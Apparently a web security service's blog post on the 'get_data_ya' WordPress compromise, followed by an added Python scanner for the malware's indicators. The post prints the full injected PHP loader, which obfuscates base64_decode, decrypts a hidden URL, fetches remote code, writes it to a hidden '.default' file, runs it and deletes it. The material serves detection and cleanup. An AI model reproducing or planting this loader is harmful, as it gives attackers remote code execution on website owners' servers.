As you know, there can be various reasons for a website to be compromised. Do you want to know the common reasons why a website was compromised?
Make sure you keep your CMS and other third-party apps updated.
In case you need help from an expert, we are available. Contact us, for $19 only!
What is the get_data_ya hack about?
A core WordPress file, functions.php inside the wp-includes folder, is modified to include dangerous code which loads/fetches malware from remote servers.
This code can be found in other core WordPress files, for example wp-config.php, and theme or plugin function files can be found infected as well.
This malware is then saved as a .php file on the infected server and used to perform nefarious activities.
Code dumped into core WordPress files
The following is the code, which can be found in various sequences. Always remember to keep your website updated and use a WordPress maintenance service to grow your site and keep it secure.
<?php
@ini_set('display_errors', '0');
error_reporting(0);
if (!$npDcheckClassBgp) {
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK4ubQYJ7ZtZZv2dPRfXN70cmCWIX7HVoQ==";
if (ini_get('allow_url_fopen')) {
function get_data_ya($url) {
$data = file_get_contents($url);
return $data;
}
}
else {
function get_data_ya($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}
function wp_cd($fd, $fa="")
{
$fe = "wp_frmfunct";
$len = strlen($fd);
$ff = '';
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len )
{
$ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
}
return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
}
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
$npDcheckClassBgp = 'aue';
}
?>
You should immediately remove this code and clean up your website, including fixing all vulnerabilities. Expert help is recommended if you aren't sure what to do.
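A small scanner for the indicators visible in the code above, as an added example that is not part of the original post: it flags PHP files containing the get_data_ya loader, the wp_cd decoder, the $npDcheckClassBgp guard, the gogo/enen markers or the split base64_decode name, and reports any .default file left where the code writes its payload. The list of file extensions and the sample tree built in demo() are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators copied from the injected code shown on this page.
INDICATORS = {
    "loader_function": re.compile(rb"function\s+get_data_ya\s*\("),
    "xor_decoder": re.compile(rb"function\s+wp_cd\s*\("),
    "run_once_guard": re.compile(rb"\$npDcheckClassBgp"),
    "payload_markers": re.compile(rb"#gogo\(\.\*\)enen#"),
    "split_base64_name": re.compile(rb"str_replace\(\s*'_sha'\s*,\s*'bas'"),
}
PHP_EXT = {".php", ".inc", ".phtml"}  # assumption: extensions worth scanning

def scan_tree(root):
    """Return {relative path: [indicator names]} for flagged files under root."""
    findings = {}
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name == ".default":
            # The injected code writes its payload to ".default", includes it
            # and unlinks it, so a leftover copy is worth inspecting.
            findings[rel] = ["dropped_payload_file"]
        elif path.suffix.lower() in PHP_EXT:
            data = path.read_bytes()
            hits = sorted(n for n, rx in INDICATORS.items() if rx.search(data))
            if hits:
                findings[rel] = hits
    return findings

def demo():
    """Scan a constructed sample tree (not real site data)."""
    samples = {
        "wp-includes/functions.php":
            b"<?php if (!$npDcheckClassBgp) { function get_data_ya($url) {} }",
        "wp-includes/clean.php": b"<?php echo 'hello';",
        "uploads/.default": b"<?php\n?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        print(rel, hits)
```

To check a real site, call scan_tree() with the WordPress root directory; because the page notes the code appears in various sequences, a file matching even one indicator should be compared against a clean copy.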